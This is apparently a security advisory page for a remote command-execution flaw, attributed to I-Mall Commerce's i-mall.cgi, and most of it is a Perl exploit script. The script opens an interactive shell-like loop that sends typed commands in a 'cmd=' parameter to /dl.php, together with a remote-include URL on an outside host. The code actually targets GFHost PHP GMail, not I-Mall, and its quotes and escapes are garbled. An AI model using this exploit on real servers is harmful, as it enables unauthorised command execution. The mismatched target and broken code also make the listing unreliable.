I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)

Summary

I-Mall Commerce is 'a CGI based online shopping suite in Korean language'. A remote command execution vulnerability has been discovered in the I-Mall CGI application by ZetaLabs, Zone-H Laboratories. The following exploit code can be used to test your system for the mentioned vulnerability. This issue occurs because the i-mall.cgi script insufficiently filters externally supplied data, which allows a remote user to pass an arbitrary shell command that the script then executes. An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.

Credit:

The information has been provided by Jerome ATHIAS.
The original article can be found at: http://www.zone-h.org/advisories/read/id=4904


Details

Exploit:
##############################################
# GFHost exploit
# Spawn bash style Shell with webserver uid
# Greetz SPAX, foxtwo, Zone-H
# This Script is currently under development
##############################################

use strict;
use IO::Socket;
# Script-wide state. Every sub below reads and writes these globals
# instead of taking arguments.
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
# Request path used by &scan and &command: the typed command is appended
# straight after "cmd=" (see &connect). Note the path is /dl.php -- the
# GFHost/GMail script named in &help -- not i-mall.cgi as the advisory
# summary states; confirm against the linked zone-h source before relying
# on either description. For detection purposes the notable request shape
# is a GET to dl.php carrying an "f=" URL and a "cmd=" parameter.
# NOTE(review): the quote characters in this listing (‘ ’ ” ′) are not
# valid Perl, and escapes such as "\n", "\s" and "\D" appear with their
# backslashes stripped; both look like page transcription artifacts, so
# the listing as printed does not compile.
$U[1] = ‘/dl.php?a=0.1&OUR_FILE=ff24404eeac528b’. ‘&f=http://utenti.lycos.it/z00/xpl.gif&cmd=’;
# Main flow: banner and prompts, server fingerprint, URL scan, then an
# interactive loop. Legacy `&name;` call style throughout.
&intro;
&scan;
&choose;
&command;
&exit;
# Start-up sequence: print the banner, prompt for host/port, then
# fingerprint the server. Pauses one second before returning.
sub intro {
&help;
&host;
&server;
sleep 1;
};
# Reads the target host and port from STDIN into the globals $host and
# $port. An empty host defaults to 127.0.0.1; the port falls back to 80
# when it is empty or when the regex check below matches. No other
# validation is done on $host before it reaches IO::Socket in &connect.
sub host {
print ‘nHost or IP : ‘;
$host=<STDIN>;
chomp $host;
if ($host eq ”){$host=’127.0.0.1’};
print ‘nPort (enter to accept 80): ‘;
$port=<STDIN>;
chomp $port;
# As printed, /D/ matches a literal "D". This reads like a non-digit check
# whose backslash was lost in transcription -- confirm against the source.
if ($port =~/D/ ){$port=’80’};
if ($port eq ” ) {$port = ’80’};
};
# Fingerprints the web server: sets $probe to 'string' so that &connect
# sends a HEAD request, then looks for "apache" in the first eleven
# response lines (indices 0..10). The non-apache branch hard-codes
# $choice = 'y' and never reads STDIN, so its &exit is unreachable and
# the fingerprint result has no effect on the rest of the run.
sub server {
my $X;
print ‘nnnnnnnnnnnnnnnnnnnnnnnn’;   # screen-clearing newlines (escapes lost on the page)
$probe = ‘string’;
my $output;
my $webserver = ‘something’;
&connect;
for ($X=0; $X<=10; $X++){
 $output = $results[$X];
 if (defined $output){
 if ($output =~/apache/){ $webserver = ‘apache’ };
 };
};
if ($webserver ne ‘apache’){
my $choice = ‘y’;   # fixed value: the /N/i test below can never be true
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print ‘nnOK’;
 };
};
# Probes every entry of @U from index 1 onward (index 0 is the slot
# &other fills) by sending the command "dir" through &connect and
# searching the response for "Directory" -- presumably the header line of
# a Windows `dir` listing, TODO confirm. A match sets $status to
# 'vulnerable', but both the per-URL branch and the final
# 'not_vulnerable' branch are empty, so the result is never reported.
# With $probe = 'scan', &connect does not print the response either.
sub scan {
my $status = ‘not_vulnerable’;
print ‘nnnnnnnnnnnnnnnnnnnnnnnn’;   # screen-clearing newlines (escapes lost on the page)
my $loop;
my $output;
my $flag;
$command=’dir’;   # overwrites whatever the user last typed in &command
for ($loop=1; $loop < @U; $loop++) {
$flag = ‘0’;
$url = $U[$loop];
$probe = ‘scan’;
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = ‘1’;
         $status = ‘vulnerable’;
         };
 };
# Both branches are empty: no per-URL report is produced.
if ($flag eq ‘0’) {
}else{
     };
};
# Empty as well: the aggregate status is discarded.
if ($status eq ‘not_vulnerable’){

    };
};
# Selects which @U entry becomes the active $url. $choice is hard-coded
# to '1' rather than read from STDIN, so the recursive re-prompts and the
# &other branch (choice 0) are dead as written; the sub always picks
# $U[1]. &command still invokes this on the "url" keyword.
sub choose {

my $choice=’1′;
chomp $choice;
if ($choice > @U){ &choose };
# As printed, /D/g matches a literal "D"; likely a non-digit check with
# the backslash lost in transcription -- confirm against the source.
if ($choice =~/D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
};
# Reads a user-supplied request path from STDIN into $U[0]. Only
# reachable from &choose when $choice is 0, which the hard-coded '1'
# there never produces.
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};
# Interactive loop. Each line read from STDIN is matched against the
# keywords quit/url/scan/help; anything else has "s" characters replaced
# by "+" (as printed -- this reads like a whitespace-to-plus rewrite
# whose backslash was lost in transcription) and is sent via &connect.
# The keyword tests are unanchored substring matches, so a command that
# merely contains "help" or "url" is treated as that keyword. The first
# four tests are case-insensitive but the final guard is not, so e.g. an
# upper-case "URL" both triggers &choose and is still sent to the server.
sub command {
while ($command !~/quit/i) {
print ‘[$host]$ ‘;   # $host would only interpolate under double quotes; see page note on quoting
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/s/+/g;
$probe = ‘command’;
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
# Opens a TCP connection to $host:$port and sends one request chosen by
# $probe: a GET of $url with $command appended (probes 'command' and
# 'scan'), or a HEAD / (probe 'string'). The response is collected into
# @results and printed by &output for the 'command' and 'string' probes.
# Detection note: the GET's query string carries the raw command after
# "cmd=", with "+" substituted by &command.
# The sub is named like the builtin connect(); the `&connect` call form
# used elsewhere is what reaches this user sub.
sub connect {
# No Timeout argument, so an unreachable host blocks for the OS default.
# The single-quoted ‘$host’/‘$port’ would be literal strings as printed;
# double quotes were presumably intended -- confirm against the source.
my $connection = IO::Socket::INET->new (
    Proto => ‘tcp’,
    PeerAddr => ‘$host’,
    PeerPort => ‘$port’,
    ) or die ‘nSorry UNABLE TO CONNECT To $host On Port $port.n’;
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection ‘GET $url$command HTTP/1.1rnHost: $hostrnrn’;
}elsif ($probe =~/string/) {
print $connection ‘HEAD / HTTP/1.1rnHost: $hostrnrn’;
};

# The while condition reads and discards the first response line (the
# status line) into $_; the list-context read then slurps the remainder
# into @results and the loop ends at EOF. The requests above are HTTP/1.1
# with no "Connection: close" header, so a keep-alive server may hold the
# socket open and this read can stall until the server times it out.
while ( <$connection> ) {
   @results = <$connection>;
    };
close $connection;
if ($probe eq ‘command’){ &output };
if ($probe eq ‘string’){ &output };
};
# Prints @results: for the 'string' (HEAD) probe only the first eleven
# lines (indices 0..10), otherwise every line. As printed, ‘$display’ is
# single-quoted and would print literally; double quotes were presumably
# intended -- confirm against the source.
sub output{
my $display;
if ($probe eq ‘string’) {
   my $X;
   for ($X=0; $X<=10; $X++) {
   $display = $results[$X];
   if (defined $display){print ‘$display’;};
    };
   }else{
   foreach $display (@results){
       print ‘$display’;
    };
                          };
};
# Prints a sign-off and terminates the process. The `&exit` calls
# elsewhere reach this sub; the bare `exit;` below resolves to the Perl
# builtin, since a user sub does not override a builtin of the same name
# without `use subs`.
sub exit{
print ‘nnn ORP’;
exit;
};
# Prints the banner and usage. Note the banner names the GFHost PHP GMail
# command-execution issue (SPABAM, 2004) and the same zone-h advisory id
# the page links, not I-Mall -- the script and the advisory summary
# describe different targets; confirm against the linked source.
# The stray ’ after the final brace is the page's closing quote, not code.
sub help {
print ‘nnnnnnnnnnnnnnnnnnnnnnnn’;   # screen-clearing newlines (escapes lost on the page)
print ‘n
        GFHost PHP GMail
        Command Execution Vulnerability by SPABAM 2004’ ;
print ‘n http://www.zone-h.org/advisories/read/id=4904
‘;
print ‘n GFHost.pl Exploit v1.1’;
print ‘n n note.. Script under DEVEL’;
print ‘n’;
print ‘n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)’;
print ‘n Command: SCAN URL HELP QUIT’;
print ‘nnnnnnnnnnn’;
};’
